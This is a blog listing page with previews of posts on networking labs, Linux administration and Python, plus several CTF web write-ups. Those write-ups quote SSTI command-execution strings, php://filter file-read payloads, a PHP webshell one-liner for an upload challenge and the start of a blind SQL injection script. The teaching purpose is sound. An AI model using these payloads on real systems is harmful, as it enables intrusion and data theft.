- 博客(77)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 【HCIP】BGP的联邦+反射器实验
从一个IBGP邻居出学习到的路由条目不能拆递给本地的其他IBGP邻居1、在一个AS中,若一台设备运行BGP协议,那么正常均会存在EBGP邻居关系 --- 连接了其他的AS 2、因为IBGP水平分割,将导致一个AS内部的所有BGP设备,均需要与该AS中所有运行BGP协议的路由器建立IBGP邻居关系 -- 关系的数量呈指数增加故在一个真实的网络中,为了避免大量的建邻,可以有条件的打破IBGP水平分割 -- 减少建邻的数量有条件地打破:打破IBGP的水平分割的前提是无环真正意义上防环...
2022-07-31 19:13:01
346
1
原创 【HCIP】BGP实验
先IP可达,两台建邻设备间可达;先使用TCP的三次握手和对端建立TCP会话;会话建立后,正常收发一次Open报文,交互各自的RID,建立BGP的邻居关系,生成邻居表;邻居关系建立后,使用Update来传输路由信息(目标网络号+属性),之后生成BGP表(本地发出及接收到的所有BGP路由);再将BGP中最优(不一定是最佳,依赖属性比较)路由加载于路由表中;收敛完成,仅Keeplive周期保活TCP会话即可;结构突变 -- 新增、...
2022-07-29 18:01:15
830
原创 【HCIP】重发布及路由策略的实验
在OSPF与RIP发送方式不一样导致产生路由回馈,在R2路由表中产生两条路由。但实际上上下两条路存在不同,我们分别在R2与R4上干涉选路—使用。此时R1到R3的选路已经完成,接下来在OSPF中干涉选路,使用。R1对OSPF和R3对RIP中的任一网段都为等开销负载均衡。的路由表与重发布前一致,故没有出现路由回馈。连通性测试R1环回pingR3环回。的路由表与重发布前不一致一致,R4环回。此时仅R1环回等开销负载均衡。此时再查看R2路由表,无。...
2022-07-28 17:40:56
441
原创 【HCIP】MGRE环境下OSPF实验,含多进程双向重发布及OSPF特殊区域
中需要1个Tunnel和1个环回—划2段借1位。拓扑中有6个区域,总体上划分6大网段—划8段借3位。中需要1段MA网络和3个环回—划4段借2位。中需要2段MA网络和2个环回—划4段借2位。中需要2段MA网络和2个环回—划4段借2位。中需要1个MA网络和2个环回—划4段借2位。中需要2个环回—划2段借1位。R1环回pingR12环回和外网。......
2022-07-23 16:04:54
491
原创 【HCIP】两个MGRE网络通过OSPF实现互联(eNSP)
在NBMA网络中,接口类型为p2p,故OSPF协议不能正常建立邻居关系,此时要将其所有接口均修改为Broadcast;R2和R3在星型MGRE网络中,还要使其放弃DR选举,否则area0选路将不一致。先配置R1-6指向ISP的缺省(不做展示)NAT地址转换,以R1为例。路由表展示及连通性测试。以R4(ISP)为例。.........
2022-07-22 20:56:58
661
原创 【HCIP】数据链路层封装技术、GRE及实验(eNSP)
普通的GRE为点到点网络类型,若将多个使用普通GRE的节点连接起来,将配置大量的网段和路由信息,且所有节点均为固定节点,此时MGRE使多个节点构成一个中心到站点的网络结构,站点可以基于NHRP实现IP地址不固定。现在98%的网络都是基于以太网实现的,之所以串行链路没有被完全淘汰,是因为它更安全,以太网中的信息传输容易被第三者截获,而串行链路中只能点到点进行通信,就保证了数据的安全。即在一个网络中,节点的数量被物理和逻辑地限制为2个,他是基于点到点类型工作的二层封装技术,不存在二层单播地址,比如MAC地址。.
2022-07-18 22:21:49
1614
原创 Ubuntu基础配置及美化(背景及命令提示符)
文章目录前言美化壁纸终端命令提示符主机名基础配置vim免密sudo前言上篇文章介绍了怎么安装Ubuntu:ubuntu-20.04.3-详细安装教程(图文)附下载地址本文介绍如何如何基础配置并美化Ubuntu美化壁纸打开【Picture】,并将图片拖入其中(我们在上篇文章中安装了VM Tools)右键图片,选择【Set As Wallpaper】这样我们就设置了壁纸终端接下来我们点开终端,右键选择【Preferences】,作以如下设置命令提示符在命令行输入:sudo vi .
2022-02-26 17:04:31
1883
1
原创 ubuntu-20.04.3-详细安装教程(图文)附下载地址
文章目录下载地址安装过程下载地址VMware Workstation 下载地址:https://www.vmware.com/go/getworkstation-winUbuntu下载地址:https://mirrors.tuna.tsinghua.edu.cn/ubuntu-releases/focal/ubuntu-20.04.3-desktop-amd64.isohttps://mirrors.lzu.edu.cn/ubuntu-releases/20.04.3/ubuntu-20.04.3
2022-02-26 15:34:13
52441
7
原创 用 Ansible 在Linux系统上搭建一个基于用户控制的https网站
文章目录前言实验环境配置--------------含源码--------------前言Playbook 是 Ansible “任务书”,它采用了 YAML 语法,学习 Ansible 以及前置配置请移步:Ansible的原理与配置本文介绍一个简单的小实验,要求如下:网站要求:协议https、可以用户控制用 Playbook 编写任务实验环境配置创建 Ansible 工作目录[root@master:~]$ su - classLast login: Mon Feb 21 18
2022-02-24 18:18:44
417
原创 DNS服务器的原理及搭建
文章目录原理搭建DNS服务器正向解析原理DNS(Domain Name System)是互联网上的一项服务,它作为将 域名 和 IP 地址相互映射的一个分布式数据库,能够使人更方便的访问互联网。想要了解域名(Domain Name)解析原理就要先了解域名,域名可分为三大类:1.国家顶级域名:cn、uk、us等。国家域名又常记作 ccTLD(country code top-level domains,cc表示国家代码contry-code)。2.通用顶级域名:com、net、dov等。3.基础结
2022-02-21 19:06:00
5815
原创 【Ansible】Playbook的编写+实验
文章目录前言Playbook实验前言Playbook 是 Ansible “任务书”,它采用了 YAML 语法,学习 Ansible 以及前置配置请移步:Ansible的原理与配置Playbook扩展名:.yml / .yaml格式:严格的缩进语法,两个空格(建议不用 Tab);采用键值对格式开头:---正文:(以 play 列表的形式定义 Playbook)
2022-02-21 14:04:13
1417
2
原创 Ansible的原理与配置【超详细】
文章目录Ansible原理环境搭建基础配置环境配置编写文件实验补充Ansible原理Ansible 是一款开源自动化平台。它是一种简单的自动化语言,能够在 Ansible Playbook 中完美地描述 IT 应用基础架构。它也是一个自动化引擎,可运行 Ansible Playbook。Ansible 可以管理强大的自动化任务,而且能够适应许多不同的工作流和环境。同时,Ansible 新用户可以非常快速地利用它来提高工作效率。说白了就是批量化部署(控制)其他主机,控制的主机叫做控制节点(master
2022-02-19 21:55:57
1958
4
原创 Linux搭建NFS服务器
文章目录前言NFS 的使用搭建一个 NFS 服务器前言NFS(Network File System,网络文件系统)是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间通过 TCP/IP 网络共享资源,主要在 unix 系列操作系统上使用。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。由于 NFS 支持的功能比较多,而不同的功能都会使用不同的程序来启动,每启动一个功能就会启用一些端口来传输数据,因此 NFS 的功能所对应的端口并不
2022-02-18 22:26:34
4703
原创 Linux 网站管理进阶,https以及虚拟目录的搭建
文章目录前言前置技能搭建HTTPS网站虚拟目录基于用户控制访问最终网站的搭建前言安全套接字层超文本传输协议HTTPS(全称:Hyper Text Transfer Protocol over Secure Socket Layer 或 Hypertext Transfer Protocol Secure,超文本传输安全协议),是以安全为目标的HTTP通道。HTTPS并不是一个新协议,而是HTTP+SSL(TLS)。SSL 是“Secure Sockets Layer”的缩写,中文叫做“安全套接层”。
2022-02-18 18:42:05
2006
原创 在Linux上搭建一个自己的网站
文章目录前言配置前言搭建一个网站,首先需要的是Web服务器,我们这里使用 Apache,它是由 httpd 服务调度,我们先使用这个服务搭建一个简单的静态页面配置
2022-02-18 15:37:23
17573
5
原创 基于ssh的远程连接服务器
文章目录远程连接服务器客户端连接服务端远程连接服务器远程连接服务器通过文字或图形接口方式来远程登录系统,让你在远程终端前登录 linux 主机以取得可操作主机接口(shell),而登录后的操作感觉就像是坐在系统前面一样。而他以登录的连接界面可以分为两类:文字接口:- 明文传输:Telnet、RSH…- 密文传输:SSH…(主要)图形接口:VNC…SSH(Secure Shell Protocol,安全的壳程序协议),它可以通过数据包加密技术将等待传输的数据包加密后再传输到网络上。ssh
2022-02-16 21:00:10
2117
原创 Linux例行性工作 - 单一执行与循环执行
文章目录前言atcron前言Linux的例行性工作分为两种,一种是但一执行(at),一种是循环执行(crontab)at要使用单一的计划任务,Linux负责这个调度的是 atd,我们使用 at 命令来生成所要运行的工作,并将这个任务以文本的方式存放在 /var/spool/at/ 内。用法如上at 20:58touch /file1<Ctrl+D>还有一种方法,它可以更详细地规定时间,表示当前时间后的几分钟at now + 1 minutestouch /file
2022-02-14 22:11:08
863
原创 chrony的安装与使用,再搭建一个自己的时间服务器
文章目录前言安装时间服务器前言这里我们使用 chrony 来搭建时间服务器,这里需要对防火墙做一些操作,我们直接关闭就好。chrony 简介chrony是一个ntp协议的实现程序,既可以当做服务端,也可以充当客户端,它能保持系统时钟与时钟服务器同步,让时间保持精确。总之他比起 NTP 是有很大优势的,我们多的不谈,直接开始操作安装yum install chrony -y查看存在文件rpm -ql chrony我们先将时间改成错误时间,用于测试启动服务systemctl
2022-02-14 19:48:32
5314
原创 基于Team机制的链路聚合
文章目录前言示例前言在 linux 中, Rhel7 之前都是使用 bond 机制 来实现多网卡绑定同一个 IP 地址,来对网络提供访问,并按不同的模式来负载均衡或者轮回接替管理处理数据。而到了 Rhel7 之后,提供了一种强大的工具, nmcli 工具命令,使用此工具,将会根据命令参数的配置来重新生成特定的配置文件来供网络接口使用,方便而又灵活。在 Rhel7中,不再使用bond 机制定义,而是使用网络组 team 机制 ,把 team 组当作一个设备示例接下来我们直接做一个简单实验先添加两张
2022-02-13 21:53:48
881
原创 php://filter详解,为什么include可以使用伪协议读取文件
我们都知道 include() 是文件包含的意思,举个简单的例子:#include<stdio.h>void main() { . . .}很显然,include() 用法同C语言:引入一个文件,则这个文件中的所有内容(变量、函数、类)都可以在本文件中使用。回到PHP,文件包含的具体细节:我在本地写一个 1.jpg(这里讲将文件类型不写成PHP,意为:include 函数会读取文件内容,不需要知道这是什么文件)访问本地页面此时我将 1.jpg 中的内
2022-01-12 21:09:02
955
1
原创 利用 pearcmd.php 实现 Getshell
文章目录源码分析利用Pearcmd.php学习连接:西湖论剑的一道Web源码<?phphighlight_file(__FILE__);if(isset($_GET['check'])){ if(file_get_contents($_GET['check']) === "LFI"){ @include($_GET['a']); }else{ die("no!"); }}分析信息搜集了一圈,啥也没有,也就是说不知
2022-01-12 19:53:39
640
原创 Web - Include_NBAplayer
文章目录信息收集测试信息收集查看源码这里可能存在文件包含测试随便选一个伪协议,查看当前页面php://filter/read=convert.base64-encode/resource=include/file1.php得到源码<?php$html.=<<<A<img class=player src="include/kobe.png" /><p class=nabname>Kobe Bryant is one of the
2022-01-12 17:23:06
256
原创 一个动态路由OSPF配置实例(eNSP)
文章目录要求分析配置要求全网可达使用 ospfR2-R5所在 MA 网络当中只有 R2 为 DR ,其他为 DRotherR1-R2 做接口认证区域2 做认证R5 的还回不能被宣告分析全网可达;使用 ospf使用动态协议 OSPFR2 - R5 所在的 MA 网络中 R2 为 DR,其他为 DRother将其他的优先级改为 0,使其不参与选举R1-R2 做接口认证;区域 2 做认证做两个手工认证,一个接口认证,一个区域认证R5 的环回不能被宣告做 osp
2022-01-11 18:15:57
881
原创 动态路由实验(eNSP)
文章目录要求分析配置要求全网可达R4 的环回路由不能被宣告R2 R3 R4 各有两个环回需要汇总保证更新安全加快收敛速度分析全网可达 —> 动态路由实现环回汇总 —> CIDR保证更新安全 —> 手工认证加快收敛速度 —> 修改 rip time配置配置直连及环回[R2]interface g0/0/0[R2-GigabitEthernet0/0/0]ip address 12.1.1.2 24Jan 8 2022 10:39:57-08:
2022-01-09 00:42:17
3328
原创 一个静态路由配置实例(eNSP)
文章目录任务分析0x01网段划分(分析)0x020x030x04总结配置IP静态路由缺省路由防环路由浮动静态路由任务除 R5 的环回地址固定外,其他网段全部基于 192.168.1.0/24 进行合理的 IP 地址划分R1-R4 每台路由器存在两个环回接口R1-R4 上不能直接编写到达 5.5.5.0/24 的静态路由,但依然可以访问全网可达,尽量减少每台路由器路由表条目;避免环路出现R4 与 R5 之间,正常 1000M 连路通信,故障时自动改为 100M分析0x01所有网段(除
2022-01-07 16:31:11
2773
原创 [BJDCTF2020]ZJCTF,不过如此
[BJDCTF2020]ZJCTF,不过如此源码<?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1><
2021-12-29 16:18:40
300
原创 BUUCTF - Web - [ZJCTF 2019]NiZhuanSiWei
[ZJCTF 2019]NiZhuanSiWei源码<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'
2021-12-29 01:15:42
1680
原创 BugKu - Web - Simple_SSTI_1
Simple_SSTI_1猜测GET传参flag:?flag=1测试注入:?flag=${7*7}?flag={{7*7}}?flag={{7*'7'}}所以该模板使用的是jinja2渲染:?flag={{[].__class__.__base__.__subclasses__()}}?flag={{[].__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']("ls").read()}}?fl
2021-12-28 11:09:07
2067
原创 NUAACTF - Web - Ez_Flask
按照提示随便传一个:?name=123可能存在模板渲染,检测一下:?name=${2*7}?name={{7*7}}?name={{7*'7'}}发现是 jinja2 渲染看一下所有的类:?name={{[].__class__.__base__.__subclasses__()}}可以一点一点的往下找,也可以直接写payload{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ ==.
2021-12-27 17:57:32
625
原创 验证码绕过wp
拿到一个网站,在最下面可以看到Prowed by UsualToolCMS下载到该 CMS 的源码,发现有 cmsadmin访问可能存在验证码绕过,抓包看一下弱密码爆一下成功登录,访问该目录下的flag.php发现a_templetex.php中有更新数据的地方,我们可以在这里插马<?phprequire_once 'a_top.php';$t=UsualToolCMS::sqlcheck($_GET["t"]);$x=UsualToolCMS::sqlcheck($_
2021-12-23 21:16:23
1610
原创 BUUCTF - Web - [CISCN2019 华北赛区 Day2 Web1]Hack World
[CISCN2019 华北赛区 Day2 Web1]Hack World测试id=1id=2fuzz 一下,空格/union/order by/updatexml/and/or等字符分析尝试盲注,题目给出表及字段,使用异或连接,用括号代替空格0^(ascii(substr((select(flag)from(flag)),1,1))>1)脚本import requestsurl="http://9fbcd2c9-29c1-45ee-8aa2-d17756ace4c0.no
2021-12-18 22:52:51
303
原创 BUUCTF - Web - upload三联
文章目录[极客大挑战 2019]Upload[ACTF2020 新生赛]Upload[MRCTF2020]你传你????呢[极客大挑战 2019]Upload一个文件上传的题,先看一眼发现没有前端检测,那就是后端脚本,先随便传个图片马操,上传成功了。。。里面写的是:GIF89a //GIF文件头<script language="php">eval($_REQUEST[8])</script>这是随便传的以前的图片,以下是正常顺序:先写个一句话木马传上去:<
2021-12-16 01:08:58
1416
原创 0x09 - 详谈Python循环结构
文章目录whilefor常用循环算法目录:0x00 - Python学习笔记while在日常生活中,很多地方要用到循环算法,while是循环算法的关键词之一示例:我们将 10000 元存入一个年利率为 5% 的银行账户中,求账户余额增长到原来投资额的两倍需要多少年?# 创建常量变量INITIAL_BALANCE = 10000.0RATE = 5.0TARGET = 2 * INITIAL_BALANCE# 初始化用于循环的变量balance = INITIAL_BALANCEyea
2021-12-10 17:27:17
738
原创 0x08 - 详谈Python选择结构
文章目录if语句条件表达式关系运算符浮点数的精确比较多分支结构布尔变量和运算符级联关系运算符布尔运算符的短路求值德 · 摩根律分析字符串练习目录:0x00 - Python学习笔记if语句在生活中,很多地方需要用到分支结构,在Python中,我们使用if语句实现分支下面是一个使用if语句的示例:在很多国家,13是个不吉利的数字,所以楼层上不显示13层,我们如何用Python解决这个问题?actualFloor = 0if floor > 13 : actualFloor = f
2021-12-10 02:42:13
697
原创 Web - EzPop链构造
文章目录源码分析payload源码<?phpclass start_gg{ public $mod1; public $mod2; public function __destruct() { $this->mod1->test1(); }}class Call{ public $mod1; public $mod2;
2021-12-09 01:17:13
233
原创 Web - pop链构造
文章目录源码分析payload*2源码<?php// flag in flag.phpclass C1e4r{ public $test; public $str; public function __construct($name){ $this->str = $name; } public function __destruct(){ $this->test = $this->str;
2021-12-09 00:55:50
480
原创 0x07 - Python中的字典和集合
文章目录字典内建方法集合目录:0x00 - Python学习笔记字典当索引不好用时,就有了字典的诞生,他是Python中唯一一个映射类型,用键值对来表示的,一个 键值对 就叫做一个 像 ,有的地方也称关联数组字典中是没有顺序的,它会自动按照字符优先级储存像列表、元组、字符串都属于 映射类型 ,他的索引(0,1,2,…)与内容无关创建Python中用大括号来表示一个字典>>> dict1 = {'img':'1.png', 'key':'yes', 'path':'fla
2021-12-08 03:31:18
544
原创 0x06 - Python的递归(斐波那契数列及汉诺塔游戏的实现)
递归简单来说就是函数内部调用自己的行为举个简单的例子,阶乘:def factorial(n): if n == 1: return 1 else: return n * factorial(n-1)number = int(input('请输入一个正整数:'))result = factorial(number)print('%d 的阶乘是:%d' % (number, result))斐波那契数列def fab(n
2021-12-08 02:32:19
275
原创 BUUCTF - Web - easy_serialize_php
文章目录源码分析知识点payload其他解法源码<?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img);}if($_SESSION){
2021-12-07 10:02:39
440
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人